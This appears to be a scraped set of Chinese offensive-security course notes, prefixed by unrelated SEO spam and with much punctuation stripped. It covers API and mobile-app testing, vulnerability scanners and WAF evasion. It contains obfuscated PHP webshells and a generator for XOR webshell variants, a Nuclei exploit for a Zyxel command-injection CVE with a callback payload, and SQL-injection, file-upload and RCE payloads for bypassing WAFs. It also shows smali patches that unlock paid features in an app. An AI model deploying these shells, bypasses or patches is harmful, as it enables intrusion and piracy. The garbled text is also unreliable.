微网站下载资料怎么做,做同款的网站,北京网页设计公司兴田德润可信赖,矿泉水软文广告500字API攻防
知识点#xff1a;
1、HTTP接口类-测评
2、RPC类接口-测评
3、Web Service类-测评 内容点#xff1a;
SOAP#xff08;Simple Object Access Protocol#xff09;简单对象访问协议是交换数据的一种协议规范#xff0c;是一种轻量级的、简单的、基于XML#…API攻防
知识点
1、HTTP接口类-测评
2、RPC类接口-测评
3、Web Service类-测评 内容点
SOAPSimple Object Access Protocol简单对象访问协议是交换数据的一种协议规范是一种轻量级的、简单的、基于XML标准通用标记语言下的一个子集的协议它被设计成在WEB上交换结构化的和固化的信息。SOAP部署Web Service的专有协议。SOAP使用HTTP来发送XML格式的数据可以简单理解为SOAPHTTPXML RESTRepresentation State Teansfer即表述性状态传递在三种主流的Web服务实现方案中因为REST模式的Web服务与复杂的SOAP和XML-RPC对比来讲明显的更加简洁越来越多的web服务开始采用REST风格设计和实现。例如Amazon.com提供接近REST风格的Web服务进行图书查找雅虎提供的Web服务也是REST风格的。 WSDLWeb Services Description Language即网络服务描述语言用于描述Web服务的公共接口。这是一个基于XML的关于如何与Web服务通讯和使用的服务描述也就是描述与目录中列出的Web服务进行交互时需要绑定的协议和信息格式。通常采用抽象语言描述该服务支持的查找和信息使用的时候再将实际的网络协议和信息格式绑定给该服务。 接口数据包
Method:请求方法
攻击方式OPTIONS,PUT,MOVE,DELETE
效果上传恶意文件修改页面等
URL位移资源定位符
攻击方式猜测遍历跳转
效果未授权访问等
Params请求参数
攻击方式构造参数修改参数遍历重发
效果爆破越权未授权访问突破业务逻辑等
Authorization认证方式
攻击方式身份伪造身份篡改
效果越权未授权访问等
Headers请求消息头
攻击方式拦截数据包改Hosts改Referer改Content-Type等
效果绕过身份认证绕过Referer验证绕过类型验证DDOS等
Body消息体
攻击方式SQL注入XML注入反序列化等
效果提权突破业务逻辑未授权访问等 安全问题
XSS跨站信息泄露暴力破解文件上传未授权访问JWT授权认证接口滥用等 WebService类-WsdlSoapUI
探针?wsdl
利用SoapUIReadyAPI SOAP类-SwaggerSoapUIEXP
探针目录JS资源
利用SoapUIEXP
https://github.com/lijiejie/swagger-exp
https://github.com/jayus0821/swagger-hack
目录
/swagger
/api/swagger
/swagger/ui
/api/swagger/ui
/swagger-ui.html
/api/swagger-ui.html
/user/swagger-ui.html
/libs/swaggerui
/api/swaggerui
/swagger-resources/configuration/ui
/swagger-resources/configuration/security HTTP类-WebpackPackerFuzzer
探针插件JS资源
利用PackerFuzzer
https://github.com/rtcatc/Packer-Fuzzer Postman自动化测试
https://www.postman.com/downloads/ Dvws泄露鉴权XXE
https://github.com/snoopysecurity/dvws-node Aliyun-accesskey-tools-main APP攻防
知识点
a:资产提权-AppinfoScanner
b:评估框架-MobSFmobexler
c:抓包利器-Fridar0caprure 章节点
1、信息搜集-应用资产提取权限等
2、漏洞发现-反编译脱壳代码审计
3、安全评估-组件敏感密匙恶意分析 核心点
A:内在点-资产提取版本信息等
B:抓包点-反代理反证书协议等
C:逆向点-反编译脱壳重打包等
D:安全点-资产接口漏洞审计等 内在-资产提取-AppinfoScanner
AppinfoScanner一款适用于以HW行动/红队/渗透测试团队为场景的移动端Android、iOS、WEB、H5、静态网站信息搜集扫描工具可以帮助渗透测试工程师、攻击队成员、红队成员快速搜集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出。如Titile、Domain、CDN、指纹信息、状态信息等。
https://github.com/kelvinBen/AppInfoScanner 内在-安全评估-MobSFmobexler
移动安全框架MobSF是一种自动化的一体化移动应用程序Android/iOS/Windows渗透测试、恶意软件分析和安全评估框架能够执行静态和动态分析。MobSF支持移动应用程序二进制文件APK、XAPK、IPA和APPX以及压缩源代码并提供REST API以与您的CI/CD或DevSecOps管道无缝集成动态分析器可帮助您执行运行时安全评估和交互式仪器测试。 Mobexler是基于Elementary OS的定制虚拟机旨在帮助进行Android和iOS应用程序的渗透测试。Mobexler预装了各种开宇工具脚本黑客必备软件等这些都是安全测试Android和iOS应用程序所必须的。
https://mobexler.com/
https://github.com/MobSF/Mobile-Security-Framework-MobSF
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8008:8000 opensecurity/mobile-security-framework-mobsf:latest 外在-证书抓包- frida-serverr0capture
r0capture仅限安卓平台测试安卓7、8、9、10、11可用
无视所有证书校验或绑定不用考虑任何证书的事情
通杀TCP/IP四层模型中的应用层中的全部协议
同时协议包括HttpWebSocketFtpXmpplmapSmtpProtobuf等、及他们的SSL版本
通杀所有应用层框架包括HttpUrlConnection、Okhttp1/3/4、Retrofit/Volley等等
无视加固不管是整体壳还是二代壳或VMP不用考虑加固的事情 Firda是一款易用的跨平Hook工具Java层到Native层的Hook无所不能是一种动态的插桩工具可以插入代码到原生App的内存空间中动态的去监视和修改行为原生平台包括WinMacLinux、Android、iOS全平台 测试环境
Windows10 Python3.7 夜神模拟器 r0capture frida-server wireshark
https://github.com/r0ysue/r0capture
https://github.com/frida/frida/releases
1、本地安装Frida
pip install frida
pip install frida-tools
2、模拟器安装Frida
注意版本要和本地Frida一致
下载https://github.com/frida/frida/releases
真机ARM版本及位数 模拟器无ARM的位数
getprop ro.product.cpu.abi
adb push frida-server /data/local
cd /data/local/tmp/
chmod 777 frida-server
./frida-server
ps | grep frida
3、转发并启动Frida
adb forward tcp:xxxx tcp:xxxx
连接判断frida-ps -U frida-ps -R
4、获取包名并运行抓包
获取包名ls /data/data 或Apk Messager
python r0capture.py -U -f 包名 -p xxxx.pacp 知识点
1APP防代理绕过-应用转发
2APP证书校验类型-单项双向
3APP证书校验绕过-FridaXP框架等 章节点
1】信息收集-应用资产提取权限等
2】漏洞发现-反编译脱壳代码审计
3】安全评估-组件敏感密匙恶意分析 核心点
0、内在点-资产提取版本信息等
1、抓包点-反代理反证书协议等
2、逆向点-反编译脱壳重打包等
3、安全点-资产接口漏洞审计等 反代理绕过
https://zone.huoxian.cn/d/440-app
1.自身的抓包应用
2.Proxifier转发使用 证书校验绕过
情况一客户端不存在证书校验服务器也不存在证书校验
情况二客户端存在校验服务端证书服务器不存在证书校验单项校验
情况三客户端存在证书校验服务器也存在证书校验双向校验。
1、fridar0capture底层 可绕过双向
2、XposedJustTrustHOOK 只能绕过单向
3、反编译逆向提取证书重编打包 A:单纯开上模拟器的代理后打不开没有出现数据包的情况 反代理
B:用到proxifier转发后也打不开带上出现了数据包的情况 反证书 反编译打包
反编译加固-自动查壳脱壳
https://github.com/CodingGay/BlackDex
查壳ApkScan-PKID
脱壳BlackDex 功能修改-反编译次数会员
次数
逻辑修改手机型号
.method public getRe_today_view_times()Ljava/lang/String;
.locals 1
.line 307
iget-object v0,p0,Lcom/ufozfnxzqm/dvbphwfo/entity/UserInfo;-re_today_view_times:Ljava/lang/String;I
const-string v0,999999
return-object v0
.end method 会员
.method public getIs_vip()
.locals 1
.line 347
iget v0,p0,Lcom/ufozfnxzqm/dvbphwfo/entity/UserInfo;-is_vip;l
const/4 v0,0x1
return v0
.end method 功能修改-反编译图标信息
打包编译-证书签名修改信息
安卓修改大师-替换图标修改信息
安卓修改大师-证书自带重打包选择 微信小程序
0、apk信息资源提取
1、微信小程序-数据抓包
2、微信小程序-解包反编译 appapk-信息资源文件提取
APK Messenger-基本信息资源文件开启权限等 微信小程序-真机模拟器数据抓包
安卓系统抓包微信小程序
1、安卓系统7.0以下版本不管微信任意版本都会信任系统提供的证书
2、安卓系统7.0以上版本微信7.0以下版本微信会信任系统提供的证书
3、安卓系统7.0以上版本微信7.0以上版本微信只信任他自己配置的证书列表
基于上述我们解决的方式如下
1、将证书安装到系统证书中需要root
2、苹果手机苹果手机不受此影响
3、采用安卓系统低于7.0的模拟器
4、使用低版本电脑版微信抓包
演示逍遥模拟器5.1安卓系统微信小程序抓包
演示夜神模拟器多开5安卓系统微信小程序抓包
演示真机IPhone-IOS系统微信小程序抓包
条件抓包本机需要和IPhone手机处于同一WIFI下
iphone配置wifi的代理代理设置地址写本地抓包工具地址和端口 微信小程序-PC模拟器分包反编译
1、富哥
欢迎使用多功能小程序助手工具点击确定开始使用
免责声明不得将小程序反编译源码程序和反编译图片素材挪用商业或盈利使用
使用教程地https://www.kancloud.cn/ludeqi/xcxzs/2607637
新版下载地址https://xcx.siqingw.top/xcx.zip
2、穷哥们
https://github.com/sanriqing/WxAppUnpacker
安装node.js
https://nodejs.cn/download/
安装依赖
npm install
模拟器取出wxapkg文件
/data/data/com.tencent.mm/MicroMsg/xxxxxx/appbrand/pkg
反编译解包
node wuWxapkg.js -s../xxx.wxapkg 安全点
1、渗透角度测试的app提供服务的服务器网站接口等一旦这个有安全问题被不法分子利用相当于App正常服务就会收到直接影响
APK-白盒-Java代码审计
APK-黑盒-资产WebIP接口等
小程序-白盒-Node.js代码审计
小程序-黑盒-资产WebIP接口等
2、开发角度测试的app里代码的设计安全采用没加密的发送数据采用权限过高的设置导致攻击者利用app获取到手机的敏感信息等
弱加密逻辑安全授权中间人等 流程
A:信息收集
抓包-APP里面涉及的资产
反编译提取-APP里面涉及的资产 B:资产-信息收集
web应用
cms 中间件 框架 服务器IP 端口等
webpack webpackfuzz打包分析
web漏洞扫描 awvs进行简单探针 安全测试报告
1、Spring Boot Actuator v2未授权访问
2、Spring Boot RCE
3、HeapDump-信息泄露-账号密码等
select s from java.lang.String s where /pass/.test(s.value.toString()) HeapDump分析
JVisualVM MAT heapdump_tool等
JVisualVMjdk自带
MAThttps://www.eclipse.org/mat/downloads.php
heapdump_tool:https://github.com/wyzxxz/heapdump_tool
Actuator未授权检测
https://github.com/rabbitmask/SB-Actuator
Springboot漏洞检测
https://github.com/LandGrey/SpringBootVulExploit
OSS_AccessKey利用
https://github.com/mrknow001/aliyun-accesskey-Tools 漏洞发现
Web框架中间件
1、Burp 简单介绍使用说明
2、Xray 简单介绍使用说明
3、Awvs 简单介绍使用说明
4、Goby 简单介绍使用说明
5、Afrog 简单介绍使用说明
6、Vulmap 简单介绍使用说明
7、Pocassist 简单介绍使用说明
8、掌握工具安装使用原理联动适用
市面上有很多漏扫系统工具脚本课程讲到的基本都是目前主流推荐的优秀项目
具体项目BurpsuiteAwvsXrayGobyAfrogVulmapPocassistNessusNucleiPentestkitKunyuBP插件HaEShiroScanFastJsonScanLog4j2Scan等等。 章节点
1、漏洞发现-web框架层面
2、漏洞发现-服务中间件层面
3、漏洞发现-APP小程序层面
4、漏洞发现-PC操作系统层面 Acunetix一款商业的Web漏洞扫描程序它可以检查Web应用程序中的漏洞如SQL注入、跨站脚本攻击、身份验证页上的弱口令长度等。它拥有一个操作方便的图形用户界面而且能够创建专业级的Web站点安全审核报告。新版本集成了漏洞管理功能来扩展企业全面管理、优先级和控制漏洞威胁的能力
。。。 https://www.ddosi.org/awvs14-6-log4j-rce/
https://github.com/chatin/xray/releases
https://github.com/zan8in/afrog/releases
https://github.com/zhzyker/vulmap/releases
https://github.com/jweny/pocassist/releases
https://github.com/gobysec/Goby/releases 其他特扫
1、GUI_TOOLS_v6.1_by安全圈小王子-bugfixed
2、CMS漏洞扫描器名称 支持的CMS平台
Droopescan WordPressJoomlaDrupalMoodleSilverStripeCMSmap WordPressCMSeek WordPressWPXF wordpressWPScan WordPressWPSeku WordPressWPForce WordPressJoomlaVSJoomlaJScanner JoomlaDrupwn DrupalTypo3Scan Typo3
致远OA综合利用工具 https://github.com/Summer177/seeyon_exp seeyon_exp
通达OA综合利用工具 https://github.com/xinyu2428/TDOA_RCE TDOA_RCE
蓝凌OA漏洞利用工具/前台无条件RCE/文件写入
https://github.com/yuanhaiGreg/LandrayExploit LandrayExploit
泛微OA漏洞综合利用脚本 https://github.com/z1un/weaver_exp weaver_exp
锐捷网络EG网关RCE批量安全检测 https://github.com/Ras9er/EgGateWayGetShellEgGateWayGetshell
CMSmap针对流行CMS进行安全扫描的工具 https://github.com/Dionach/CMSmap
使用Go开发的WordPress扫洞工具 https://github.com/blackbinn/wprecon
一个Ruby框架旨在帮助对wordpress系统进行渗透测试
https://github.com/rastating/wordpress-exploit-framework
WPScan WordPress安全扫描器 https://github.com/wpscantea,/wpscan
WPForce WordPress攻击套件 https://github.com/n00py/WPForce 某APP-web扫描-常规联动-BurpAwvsXray
对比工具优缺点
对比工具使用方法
Awvs
任务添加数据头代理模式扫描模式等
examplehttp://demo.aisec.cn/
Xray:
主动扫描被动扫描POC资源等
.\xray_windows_amd64.exe webscan --basic-crawler http://xx/ --html-output tomcat.html
.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output app.html
URL单点扫描数据包扫描
1、相互联动性解决漏扫
2、相互联动性解决URL未探针
手工触发URL数据包扫描器爬虫规则探针
BurpXray联动
1、Burp设置代理转发
2、Xray设置被动扫描
AwvsXray联动
1、Awvs设置代理扫描
2、Xray设置被动扫描
AwvsBurpXray联动
1、Awvs设置代理扫描
2、Burp设置转发代理
3、Xray设置被动扫描 Vulfocus-框架扫描-特定核心-GobyvulmapAfrogPocassist
案例配合vulfocus进行某服务或中间件的安全检查评估 某资产特征-联动扫描-综合调用-GobyAwvsXrayVulmap
案例配合GobyFofa插件进行某中间件的安全检查评估
1、下载拓展插件
2、设置配置插件
3、扫描调用插件 操作系统漏洞扫描
案例1-NessusNexpose漏扫操作系统漏洞 案例2-GobyNuclei漏扫系统服务中间件漏洞
Nuclei -u http://xxx 案例3-Nuclei漏扫特定资产模板导入最新漏洞
例子CVE-2022-30525Zyxel防火墙远程命令注入漏洞
FofaViewertitleUSG FlEX 50 (USG20-VPN)
nuclei exe -t Zyxel.yaml -l z.txt
Zyxel.yaml;
id:CVE-2022-30525 info: name:cx author:remote severity:high tags:CVE-2022-30525 reference:CVE-2022-30525 requests -raw -I POST /zip/cgi-bin/handler HTTP/1 1 Host {{Hostname}} Content-Type:application/json;charsetutf-8 {command:setWanPortSt,proto:dhcp,port:1270,vlan_tagged:1270,vlanid:1270,mtu:{{exploit}},data:} payloads: exploit: -,ping -c 3 {{interactsh-url}}; attack:pitchfork matchers: -type:word part:interactsh_protocol name:dns words: -dns 案例4-FofaMapNuclei漏扫自动化特定资产漏洞 Burp插件以及其他工具
漏洞利用
知识点
1、MSF-漏洞利用框架使用
2、库查找-CVECNVD关键字
3、库整理-CVECNVD漏洞详情
4、新漏洞-框架或其他未集成利用
集成和未集成漏洞的利用思路漏洞利用条件等 漏洞资源
today-cve
https://cassandra.cerias.purdue.edu/CVE_changes/today.html
cve官网
https://cve.mitre.org/
国家信息安全漏洞共享平台
https://www.cnvd.org.cn/
国家信息安全漏洞库
http://www.cnnvd.org.cn/ 漏洞利用-整理库-PocOrExpCVE-CNVD
https://github.com/ttonys/Scrapy-CVE-CNVD
https://github.com/ycdxsb/PocOrExp_in_Github 漏洞利用-查找库-SearchSploitPoC-in-GitHub
https://github.com/nomi-sec/PoC-in-GitHub
https://github.com/offensive-security/exploitdb 漏洞利用-模块框架-MetaSploit-FrameworkMSF
https://www.metasploit.com/
安装下载https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
简单使用
https://blog.csdn.net/weixin_42380348/article/details/123549631 漏洞利用-杂乱工具-特定图像化渗透武器库v6.1 Waf攻防
知识点
1、WAF介绍模式识别防护等
2、信息收集-被动扫描第三方接口
3、信息收集-基于爬虫文件目录探针
4、信息收集-基于用户代理池白名单 章节点
WAF绕过主要集中在信息收集漏洞发现漏洞利用权限控制四个阶段。 补充点
1、什么是WAF
Web Application Firewallweb应用防火墙一种公认的说法是“web应用防火墙通过执行一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的一款产品。”
基本可以分为以下四种
软件型WAF
以软件的形式安装在服务器上面可以接触到服务器上的文件因此就可以检测服务器上是否有webshell是否有文件被创建等。 硬件型WAF
以硬件形式部署在链路中支持多种部署方式。当串联到链路上时可以拦截恶意流量在旁路监听模式时只记录攻击但是不进行拦截 云WAF
一般以反向代理的形式工作通过配置后使对网站的请求数据优先经过WAF主机在WAF主机对数据进行过滤后再传给服务器 网站内置的WAF
就是来自网站内部的过滤直接出现在网站代码中比如说对输入的参数强制类型转换对输入的参数进行敏感词检测 2、如何判断WAF
Wafw00f看图识别其他项目脚本平台
https://mp.weixin.qq.com/s/3uUZKryCufQ_HcuMc8ZgQQ 3、常见WAF拓扑防护
流量走向常见漏洞 4、目前有哪些常见WAF产品
参考https://blog.csdn.net/w2sft/article/details/104533082/
1硬件型
硬件型WAF以一个独立的硬件设备的形态存在支持多种方式如透明桥接模式、旁路模式、反向代理等部署到网络中为后端的Web应用提供安全防护是最为传统的WAF形态在受访企业中部署占比为35.2%。相比于软件产品类的WAF这类产品的优点是性能好、功能全面、支持多种模式部署等但它的价格通常比较贵。国内的绿盟安恒启明星辰等老牌厂商旗下的WAF都属于此类。
2软件型
这种类型的WAF采用纯软件的方式实现特点是安装简单容易使用成本低。但它的确定也是显而易见的除了性能收到限制外还可能会存在兼容性安全等问题。这类WAF的代表有ModSecurity、Naxsi、ShareWAF、安全狗等。
3云WAF
随着云计算技术的快速发展使得基于云的WAF实现成为可能在本次调查中占比甚至超过了传统的硬件WAF跃升为第一位达到39.4%。阿里云、腾讯云、深信服云WAF、Imperva WAF这类WAF的典型代表 信息收集常见检测
1、脚本或工具速度流量快
2、脚本或工具的指纹被识别
3、脚本或工具的检测Payload 信息搜集常见方法
1、延迟解决请求过快封IP情况
2、代理池在确保速度的情况下解决请求过快封IP的拦截
3、白名单模拟白名单模拟WAF授权测试解决速度及测试拦截
4、模拟用户模拟真实用户数据包请求探针解决WAF指纹识别 信息搜集-被动扫描-黑暗引擎第三方接口
黑暗引擎Fofa Quake Shodan Zoomeye 0.zone等
其他接口https://forum.ywhack.com/bountytips.php?getinfo 信息收集-目录扫描-Python代理加载脚本
import requests
import time
headers{
Connection:keep-alive,
Cache-Control:max-age0,
Upgrade-Insecure-Requests:1,
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/89.0.4389.114 Safari/537.36,
Sec-Fetch-Dest:document,
Accept:text/html,application/xhtmlxml,application/xml;q0.9,image/webp,image/apng,*/*,q0.8,application/signed-exchange;vb3;q0.9,
Sec-Fetch-Site:none,
Sec-Fetch-Node:navigete,
Sec-Fetch-User:?1,
Accept-Language:zh-CN,zh;q0.9,en-US;q0.8,en;q0.7,
Cookie:bdshare firstime1581597934650;PHPSESSIONncsajdvh39g
}
for paths in open(php_b.txt,encodingutf-8): #字典位置 urlhttp://www.xx.com/ pathspaths.replace(\n,) urlsurlpaths proxy{ http:xxx.xxx.com:xxxx,#代理服务器
}
try: coderequests.get(urls,headersheaders,proxiesproxy).status_code
#reqrequests.get(urls,headersheaders,proxiesproxy)
#print(urls)
#print(req.text)
#time.sleep()
print(urls|str(code))
if code200 or code403: print(urls|str(code))
except Exception as err: print(connectiong error) time.sleep(3) 知识点
1、脚本后门基础原理
2、脚本后门查杀绕过机制
3、权限维持-覆盖传参加密异或等 代码块传参数据工具指纹等表面行为
1、代码表面层免杀-ASPPHPJSPASPX等
2、工具行为层免杀-菜刀蚂剑冰蝎哥斯拉等 基础-脚本后门控制原理-代码解释
对比工具代码-菜刀蚁剑冰蝎哥斯拉等 原理-脚本后门查杀机制-函数行为
对比WAF规则-函数匹配工具指纹等 代码-脚本后门免杀变异-覆盖传参
1、php传参带入
?php
$a$_GET[a];
$aa$a.ert;
$aa(base64_decode($_POST[x]));
? ?aass
xcGhwaW5mbygpOw 2、php 变量覆盖
?php
$ab;
$bassert;
$$a(base64_decode($_POST[x]));
? 3、php 加密变异
http://www.phpjm.net/
https://www.phpjms.com/
http://1.15.155.76:1234/ 4、php异或运算
import requests
import time
import threading.queue def string(): while not q.empty(): filenameq.get() urlhttp://127.0.0.1:8081/x/filename datas{ x:phpinfo();
}
resultrequests.post(url,datadatas).content.decode(utf-8)
if XIAODI-PC in result: print(check-filename-ok)
else print(check-filename-no)
time.sleep(1) def shell_test_check() urlhttp://127.0.0.1:8081/x/33xd64.php datas{ x:phpinfo();
}
resultrequests.post(url,datadatas)content.decode(utf-8)
print(result)
if XIAODI-PC in result print(ok) if __name____main__ qqueue.Queue() for i in range(1,127): for ii in range(1,127): payloadchr(i)chr(ii) code?php $a(payload).ssert;$a($_POST[x]);? filename str(i)xdstr(ii).php q.put(filename) with open(D:/phpstudy/PHPTutorial/WWW/x/filename.a) as f: f.write(code) f.close() print(Fuzz文件生成成功) for x in range(20): tthreading Thread(targetstring) t.start() php混淆加密
blog.csdn.net/qq_41617034/article/details/104441032
?php
$fuhao!#$%^*()_?:,.{}[]\|/;
$zimuQWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm;
$strlen_fuhaostrlen($fuhao);
$strlen_zimustrlen($zimu);
for($i0;$i$strlen_fuhao;$i){ for($j0;$j$strlen_zimu;$j){ echo $fuhao[$i].^.$zimu[$j].--.($fuhao[$i]^$zimu[$j]); echo br;
}
} ?
拓展-脚本后门脚本类型-JSPASPX
5、php脚本生成器
Webshell-venom
ASP PHP JSP ASPX 菜刀-流量绕过检测
1、版本
2014 $_POST$_REQUEST 2016可以
2、特征
数据包流量特征
1、请求包中ua头为百度爬虫
2、请求体中存在evalbase64等特征字符
3、请求体中传递的payload为base64编码并且存在固定的语句 冰蝎-流量绕过特征检测
1、介绍
冰蝎利用了服务器端的脚本语言加密功能通讯的过程中
消息体内采用AES加密基于特征值检测的安全产品无法查出
2、通讯
以代码Key为密钥的AES加密解密功能
3、特征
1User-agent:代码中定义
2Pragma:no-cache
3Content-Type:application/x-www-form-urlencoded
4Accept:text/html,application/xhtmlxml,application/xml;q0.9,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9
5Accept-Encoding:gzip,deflate,br
6Accept-Language:zh-CN,zh;q0.9,en-US;q0.8,en;q0.7 哥斯拉-流量绕过特征检测
1、通讯加密
2、特征
1User-Agent:mozilla/5.0(Windows NT 10.0;Win64;x64;rv:84.0)Gecko/20100101 Firefox/84.0
2Accept:text/html,application/xhtmlxml,application/xml;q0.9,image/webp,*/*;q0.8
3Accept-Language:zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
4Cookie:PHPSESSIONrut2a51prso470jvfe2q502o44; cookie最后面存在一个; 知识点
1、Http/sSock5协议
2、AwvsXrayGoby代理
3、Proxifier进程代理利用
4、SafedogBTAliyun防护 在漏洞发现中WAF会对三个方向进行过滤拦截
1、流量速度问题
2、工具的指纹被扫描
3、工具的检测POC或Payload Awvs漏扫-safedog-白名单-内置
加入白名单扫描防safedog拉黑ip awvs漏扫-BTAliyun-代理池-内置
加入代理池扫描。防BT或Aliyun拉黑IP Xray漏扫-BTAliyun-Proxifier-进程
加入代理吃扫描防BT或Aliyun拉黑IP 知识点
1、SQL注入文件上传绕过
2、XSS跨站其他漏洞绕过
3、HPP污染垃圾数据分块等 参考点
将MySQL注入函数分为几类
拆分字符串函数midleftlpad等
编码函数ord、hex、ascii等
运算函数 - * / ^ ! like rlike reg 等
空格替换部分09、0a、0b、0c、0d等
关键数据函数user()、version()、database()等
然后将这些不同类型的函数组合拼接在一起 上传参数名解析明确哪些东西能修改
Content-Disposition:一般可以修改
name:表单参数值不能修改
filename:文件名可以修改
Content-Type:文件MIME视情况更改 XSS跨站
利用XSStrike绕过 加上--timeout或--proxy配合代理池绕过ccFuzz 其他集合
RCE
加密加码绕过算法可逆关键字绕过提交方法各种测试
txt$ystr_replace(x,,pxhpxinxfo());assert($y);submit%E6%8F%90%E4%BA%A4 文件包含
..\ ..../ ..\.\等 安全狗-SQL注入文件上传
SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html
关键字替换
http://192.168.0.100:8081/sqlilabs/Less-2/?id1 like 1
http://192.168.0.100:8081/sqlilabs/Less-2/?id1 like 12
更换提交方式
POST id -1 union select 1,2,3--
模拟文件上传 传递数据
分块传输更改数据请求格式
https://github.com/c0ny1/chunked-coding-converter
HPP参数污染id1/**id-1%20union%20select%201,2,3%23*/ 文件上传换行解析垃圾溢出%00干扰符号干扰参数模拟
filenamea.php
filenamea.php
filenamea.php%00
垃圾数据;filenamea.php
无限filename;filenamea.php
filenamea.php
filenamenameuploadfile.php
filenameContent-Disposition:form-data.php
filenamea.ph
p 安全狗-文件包含代码执行-知识点
BTAliyun-SQL注入文件上传
python sqlmap.py -u
http://xxx?name*submit%E6%9F%A5%E8%AF%A2 --random-agent --tamperrdog.py --proxyhttp://xxx代理服务器
格式替换 BTAliyun-文件包含代码执行
https://github.com/s0md3v/XSStrike
python xsstrike.py -u http://xx?mesage1submitsubmit --proxy